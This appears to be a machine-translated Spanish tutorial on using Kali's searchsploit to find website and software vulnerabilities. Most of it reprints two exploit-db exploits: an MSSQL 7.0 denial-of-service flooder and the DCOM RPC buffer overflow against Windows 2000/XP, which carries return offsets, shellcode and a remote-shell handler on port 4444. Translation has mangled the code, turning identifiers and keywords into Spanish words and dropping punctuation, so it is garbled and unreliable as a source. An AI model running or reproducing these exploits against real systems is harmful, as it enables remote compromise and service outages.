Colección de citas famosas - Colección de consignas - Enseñar cómo usar kali para encontrar vulnerabilidades en sitios web

Enseñar cómo usar kali para encontrar vulnerabilidades en sitios web

Searchsploit

Este artículo proviene de www.cnhackteam.org.

Searchsploit buscará información sobre vulnerabilidades del software a través del exploit-db local.

Abra la línea de comando de kali e ingrese:

searchsploit

Ver ayuda del sistema

Buscar vulnerabilidades de mssql

Si desea encontrar vulnerabilidades en mssql, el comando es el siguiente, encontrará toda la información de vulnerabilidad relacionada con mssql, seguida de la información de descripción de vulnerabilidad relevante:

searchsploit mssql

Mire la descripción de las vulnerabilidades relacionadas. Si desea ver la vulnerabilidad remota de DOS de mysql7.0, simplemente use un editor para abrir la ruta detrás de la descripción de la vulnerabilidad:

leaf pad/usr/share/exploit db /plataformas/. /windows/dos/562.c

El contenido del archivo de texto son archivos de descripción de vulnerabilidades y archivos de explotación de vulnerabilidades:

/* El servidor Microsoft mssql 7.0 es vulnerable a ataques de denegación de servicio

*Al enviar un búfer grande que contiene datos específicos, un atacante puede bloquear

servicios

* "mssqlserver "Los errores detectados varían según el servicio

envuelto, pero el resultado es siempre

* el mismo.

*Código de excepción = c0000005

*Vulnerable a: MSSQL7.0 sp0 - sp1 - sp2 - sp3

*Este código es solo para fines educativos. responsable de tus acciones

* Saludos: sm0g DEADm|x #crack.fr itmaroc y todos los olvidé */# include lt;stdio.h gt

# include ltwinsock.

#pragma comment(lib, "ws2_32")

u _ long resolv(char *);

void main(int argc, char * *argv ) {

WSADATA WinsockData

sockets; int i; estructura en vulh sockaddr_inchar buffer[700000] for(i = 0; i lt700000; i = 16)memcpy(buffer i, "\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc", 16); p>

printf("Denegación de servicio MSSQL\n");

printf("Autor securma massine\n");

No hice ningún examen

Debes ser responsable de tus propias acciones.

printf(" sintaxis: MSSQL dos lt; ip gt lt puerto gt\ n ");

Salir (1);

WSAStartup(0x101, ampWinsockData);

s=socket(AF_INET, SOCK_STREAM, IP proto_TCP);

memoria cero(amp; vulh, sizeof(vulh));

vulh.sin _ family = AF _ INET

vulh .sin _ addr s _ addr = resolv(argv[1]); _ puerto = htons(atoi(argv[2]); if (connect(s, (struct sockaddr *) amp; vulh, sizeof(vulh))==SOCKET_ERROR) {

printf(" Conector imposible ...el puerto suele ser 1433...\n ");

Salir(1);

}

{

send(s, buffer, sizeof(buffer), 0

printf("Entorno de datos...\ n "); ("\nattendez querques segundos and verifiez que le server ne

informe agregado. \n ");

closesocket

WSACleanup() ;

}

u _ long resolv(char *hostname){ struct in _ addr addrstruct hostent * host _ entif((addr . s _ addr = inet _ addr(host _ nombre))= = -1){ if(!(host _ ent = gethostbyname(host _ nombre))){

printf ("Erreur DNS: No se puede obtener la dirección s

! !\n ", nombre de host);

Salir(1);

copiar memoria((char *) amp; addr .s_addr,host_ent-gt;h_addr,host_ent-gt;h_length) ;

} return addr.s_addr

}//milw0rm.com[ 2004-09-29]Ver código

Busque vulnerabilidades relacionadas con Windows XP.

searchsploit /xp

Para ver el archivo de explotación:

leaf pad /usr/share/exploit db/platforms/. /windows/remote/66.c

/*

? LSD: aproveche el código basado en Xfocus para descubrir el desbordamiento de DCOM RPC

Autor H D. Moore HDM de ltmetasploit.com

- Uso:.

/DCOM lt;ID de destino gt ltIP de destino gt

? -Objetivo:

? - ?0 Windows 2000 SP0(inglés)

? - ?1 Windows 2000 SP1(inglés)

? - ?2 Windows 2000 SP2(inglés)

? - ?3 Windows 2000 SP3 (inglés)

? - ?4 Windows 2000 SP4 (inglés)

? - ?5 Windows XP SP0 (inglés)

? - ?6 Windows /socket . h gt; # incluye ltnetinet/in . h gt; # incluye ltfcntl.h gt # incluye ltunistd. h gt Carácter sin firmar bindstr[]={ 0x05, 0x00, 0x0B, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00, 0x16, 0xD0, 0x16, 0x00, 0x00 , 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01 solicitud de carácter sin firmar 1[]={ 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xE8, 03, 0x00, 0x00, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x06, 0x04, 0x00, 0x05, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, solicitud de carácter sin firmar2[]={ , 0x00, 0x00, 0x00 , 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x5C, 0x00, 0x5C, 0x 00 }; Solicitud de carácter sin firmar 3[]={ 0x5C, 0x00, 0x43, 0x00, 0x24, 0x00, 0x5C, 0x00 , 0x31, 0x00 , 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00, 0x36, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00 unsigned char *target[] =

{"Windows 2000 SP0 (inglés)", "Windows 2000 SP1 (inglés)", "Windows 2000 SP2 (inglés)", "Windows 2000 SP3 (inglés)", "Windows 2000 SP4 (inglés)", "Windows XP SP0 (inglés)" , "Windows XP SP1 (inglés)", NULL }; desplazamiento largo sin firmar [] =

{ 0x77e81674, 0x77e829ec, 0x77e824b5, 0x77e8367a, 0x77f92a9b, 0

x77e9afe3,0x77e626ba,

}; char unsigned sc[]= "\x46\x00\x58\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x44\x00 \x42\x00\x46\x00\x58\x46\x00\x58\x00 "" \x46\x00\x58\x00\x46\x00\x00\x00\x00" ]={ 0x01, 0x10, 0x08, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0x20, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2D, ​​0x00, 0x00, 0x00, 0x88, 0x2A, 0x0C, 0x00, 0x02, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x 88, 08, 02, /*Extraído del código TESO*/void shell(int sock){ int l; char buf[512];

fd_set? rfds while (1) {

FD _ SET(0 amp; rfds

FD _ SET(calcetín amp ;rfds);

select (calcetín 1, amprfds, NULL, NULL, NULL); if (FD_ISSET (0, amprfds)) {

l = leer (0, buf, sizeof(buf)); lt; = 0) { printf("\n - Conexión cerrada por usuario local\n "); salir (EXIT _ FAILURE

}

write (sock, buf, l);

} if (FD_ISSET (sock, amprfds)) {

l = leer (sock, buf, sizeof(buf)) ;if (l == 0) { printf ("\n - La conexión fue cerrada por el host remoto.

\n ");Salir(EXIT_FAILURE);

} else if(l lt;0) { printf ("\n - Error al leer\n");Salir(EXIT_FAILURE);

}

escribir (1, buf, l);

}

}

} int principal (int argc, char * * argv) { int sock; int len, len 1; unsigned int target_id unsigned long retstruct sockaddr_in target_ip unsigned short port = 135; unsigned char buf 1[ 0x 1000]; -\n "); printf("-Explotación remota de desbordamiento del búfer DCOM RPC\n"); printf("-Código original de FlashSky y Benjurry \n "); printf("-adaptado de HDM lthdm[arroba]metasploit.com gt;\n "); if(argc lt;3)

{ printf("-uso: s lt ID de destino gt ltIP de destino gt\n ", argv[0]); printf("- Objetivos:\n "); for(len = 0; objetivo[len]!= NULLlen)

{ printf ("-?d\ts\n ", len, objetivos[len]); ?

} printf(" \ n "); exit (1);

} / *Sí, eso es razonable :)*/target _ id = atoi(argv[1]) ;

ret = offsets[identificador de destino]; printf("-use dirección de retorno 0x.8x\n ", ret );

target_ip.sin_family = AF_INET

target_IP.sin _ addr s _ addr = inet _ addr(argv[2]);

target_IP . sin _ puerto = htons(puerto); if ((sock=socket(AF_INET, SOCK_STREAM, 0) ) == -1)

{

perror("-Socket ") ; return(0);

} if(connect(sock, (struct sockaddr *)? _ip, tamaño de (ip_destino))! = 0)

{

error("-Conectar "); return(0);

}

len = sizeof( sc); memcpy(buf2, request1, sizeof(solicitud 1));

len 1 = sizeof(solicitud 1);

*(unsigned long*)(solicitud2 )=* (unsigned long*)(solicitud 2) sizeof(sc)/2;?

*(unsigned long*)(solicitud2 8)=*(unsigned long*)(solicitud 2 8) s

izeof(sc)/2;memcpy(buf2 len1,request2,sizeof(solicitud 2));

len 1 = len 1 sizeof(solicitud 2);memcpy(buf2 len1,sc,sizeof(sc)

len 1 = len 1 tamaño de(sc); memcpy(buf2 len1, solicitud3, tamaño de(solicitud 3));

len 1 = len 1 tamaño de(solicitud 3) ;memcpy(buf2 len1, request4, sizeof(solicitud 4));

len 1 = len 1 sizeof(solicitud 4);

*(unsigned long*)( buf2 8) =*(unsigned long*)(buf 2 8) sizeof(sc)-0xc;

*(unsigned long*)(buf2 0x10)=*(unsigned Long*)(buf 2 0x 10) sizeof (sc)-0xc;?

*(Unsigned long*)(buf2 0x80)=*(Unsigned long*)(buf 2 0x 80) sizeof(sc)-0xc;

*(unsigned long*) (buf2 0x84)=*(unsigned long*)(buf 2 0x 84) sizeof(sc)-0xc;

*(unsigned long *)(buf2 0xb4)=*(unsigned long*)(buf 2 0x B4) sizeof(sc)-0xc;

*(unsigned long*)(buf2 0xb8)= *(unsigned long*)(buf 2 0x b8) sizeof(sc)-0xc;

*(unsigned long*)(buf2 0xd0)=*(unsigned long *)(buf 2 0xd 0) sizeof(sc)-0xc;

*(unsigned long*)(buf2 0x18c)=*(unsigned long*)(buf 2 0x 18c ) sizeof(sc)-0xc; if (send(sock, bindstr, sizeof(bindstr), 0)== -1)

{

error("-Enviar ") ;return(0);

}

len=recv(sock,buf1,1000,0);if ( enviar(sock,buf2,len1,0)== -1 )

{

error("-Enviar "); }

Cerrar(calcetín);

dormir(1);

target_ip.sin_family = AF_INET

target_IP.sin_addr.s_addr= inet_ addr(argv[2]);

target_IP.sin_port = htons(4444);if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)

{

perror("-Socket "); return(0);

} if(connect(sock, (struct sockaddr *)?_i

p,tamañode(target_ip))! = 0)

{ printf("- El exploit parece haber fallado.\n "); return(0);

} printf("-Ponlo en el shell del sistema. ..\ n \ n ");

Concha (calcetín); return(0);

}//milw0rm.com[2003-07-26]Ver código

Encontrar las vulnerabilidades de Apple

Buscar en Apple